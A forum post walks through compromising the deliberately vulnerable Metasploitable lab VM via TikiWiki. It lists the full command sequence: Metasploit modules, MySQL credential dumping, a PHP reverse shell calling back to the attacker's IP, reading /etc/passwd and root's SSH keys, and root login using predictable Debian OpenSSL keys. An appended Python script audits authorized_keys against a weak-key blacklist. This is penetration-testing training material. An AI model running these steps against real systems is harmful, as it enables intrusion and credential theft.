Thread: [Video] Metasploitable - TikiWiki

#1 - Posted by g0tmi1k (Moderator; joined Feb 2010; 1,771 posts)

[Video] Metasploitable - TikiWiki

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3826160
    Download video: http://www.mediafire.com/?pr702t9cp4mlkct
    Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2

    What is this?

    This video demonstrates an attack on the TikiWiki service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


    Guide
    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to discover the database details (gaining access)
    > Can also use an exploit (gaining access)
    > Search the database for the account information (gathering information and gaining access)
    > Use a web based backdoor to create shell access (remote access)
    > Automate shell access via Metasploit (remote access)
    > *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
    > Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
    > Connect via SSH as root (complete access)
    > Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > DirBuster v0.12 --- on Backtrack 4 (Final)
    > SSH --- on Backtrack 4 (Final)
    > NetCat --- on Backtrack 4 (Final)
    > php-reverse-shell v1.0 --- http://pentestmonkey.net/tools/php-reverse-shell/
    > Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) --- http://www.mediafire.com/?i2mnwymzt51
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

    Commands:

    Code:
    nmap 192.168.1.1/24
    firefox 192.168.1.105
    cd /pentest/web/dirbuster
    java -jar DirBuster-0.12.jar -u http://192.168.1.105
    firefox 192.168.1.105/tikiwiki
    msfconsole
    search tikiwiki
    use admin/tikiwiki/tikidblib
    setg RHOST 192.168.1.105
    exploit
    firefox -> www.exploit-db.com -> TikiWiki (2701).
    firefox 192.168.1.105/tikiwiki/ -> 192.168.1.105/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
    mysql -h 192.168.1.105 -u root -p
    show databases;
    use tikiwiki195;
    show tables;
    select * from users_users;
    select login, password from users_users;
    admin
    admin
    [new password]
    php reverse shell
    php-reverse-shell.php -> shell.php
    kate -> shell.php -> Replace: 127.0.0.1 with 192.168.1.103 [Our IP]. Replace: 1234 with 4321.
    http://192.168.1.103/tikiwiki/backups/shell.php
    nc -v -l -p 4321
    whoami
    hostname
    cat /etc/passwd
    search tikiwiki
    use exploit/unix/webapp/tikiwiki_graph_formula_exec
    show options
    show payloads
    setg payload generic/shell_bind_tcp
    show options
    exploit
    ls
    whoami
    cat /etc/passwd
    ls -lart /root
    ls -lart /root/.ssh
    cat /root/.ssh/authorized_keys
    firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
    ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
    whoami
    hostname

    Notes:

    Song: Orbital - Halcyon and On and On
    Video length: 8:11
    Capture length: 21:34

    Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tikiwiki.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30077-%5Bvideo%5D-metasploitable-tikiwiki.html#post167041
    Last edited by g0tmi1k; 03-05-2011 at 02:03 PM.
    Have you...g0tmi1k?
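The privilege-escalation step in the video works because a key in root's authorized_keys belongs to the set of predictable Debian OpenSSL keys. The defender's counterpart is to audit authorized_keys files against a blacklist of known-weak key fingerprints, which is what the following added example does. It is not code from g0tmi1k's post or from the Metasploitable project; the authorized_keys text and the blacklist it uses are constructed for the demonstration (the key blobs are arbitrary bytes, not real SSH keys), and a real audit would load the fingerprints of the published weak keys instead.

```python
# Added example (not from the original post): flag authorized_keys entries
# whose fingerprint is on a blacklist of known-weak keys.
import base64
import hashlib
import sys


def fingerprint(key_b64: str) -> str:
    """Return the OpenSSH-style SHA256 fingerprint of a base64 key blob."""
    raw = base64.b64decode(key_b64)
    digest = hashlib.sha256(raw).digest()
    # OpenSSH prints the base64 digest without '=' padding.
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Yield (line_no, key_type, key_b64, comment) for each key line.

    A line may carry a leading options field (e.g. from="10.0.0.0/8"),
    so the key type is located rather than assumed to be the first field.
    """
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split()
        type_idx = next(
            (i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-"))),
            None,
        )
        if type_idx is None or len(fields) < type_idx + 2:
            continue  # malformed line: no key type or no key blob
        key_type, key_b64 = fields[type_idx], fields[type_idx + 1]
        comment = " ".join(fields[type_idx + 2:])
        yield line_no, key_type, key_b64, comment


def audit(text: str, blacklist: set) -> list:
    """Return one finding dict per key whose fingerprint is blacklisted."""
    findings = []
    for line_no, key_type, key_b64, comment in parse_authorized_keys(text):
        try:
            fp = fingerprint(key_b64)
        except ValueError:
            continue  # blob is not valid base64; skip rather than crash
        if fp in blacklist:
            findings.append({"line": line_no, "type": key_type,
                             "fingerprint": fp, "comment": comment})
    return findings


# Constructed key blobs (arbitrary bytes, not real keys) and a constructed
# blacklist standing in for the fingerprints of the known-weak keys.
WEAK_BLOB = base64.b64encode(b"constructed-weak-key-blob").decode()
GOOD_BLOB = base64.b64encode(b"constructed-good-key-blob").decode()
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    f"ssh-rsa {WEAK_BLOB} root@target",
    f'from="10.0.0.0/8" ssh-rsa {GOOD_BLOB} admin@laptop',
    "not-a-key-line",
])
WEAK_FINGERPRINTS = {fingerprint(WEAK_BLOB)}


def main(argv):
    # With a path argument, audit that file; otherwise audit the sample.
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_AUTHORIZED_KEYS
    for f in audit(text, WEAK_FINGERPRINTS):
        print(f"line {f['line']}: blacklisted {f['type']} key "
              f"{f['fingerprint']} ({f['comment']})")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run as `python audit_keys.py /root/.ssh/authorized_keys` with the blacklist replaced by the real weak-key fingerprints; the same check belongs on every user's authorized_keys and on the host keys in /etc/ssh, since the weakness was in the generator, not in where the key ended up.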
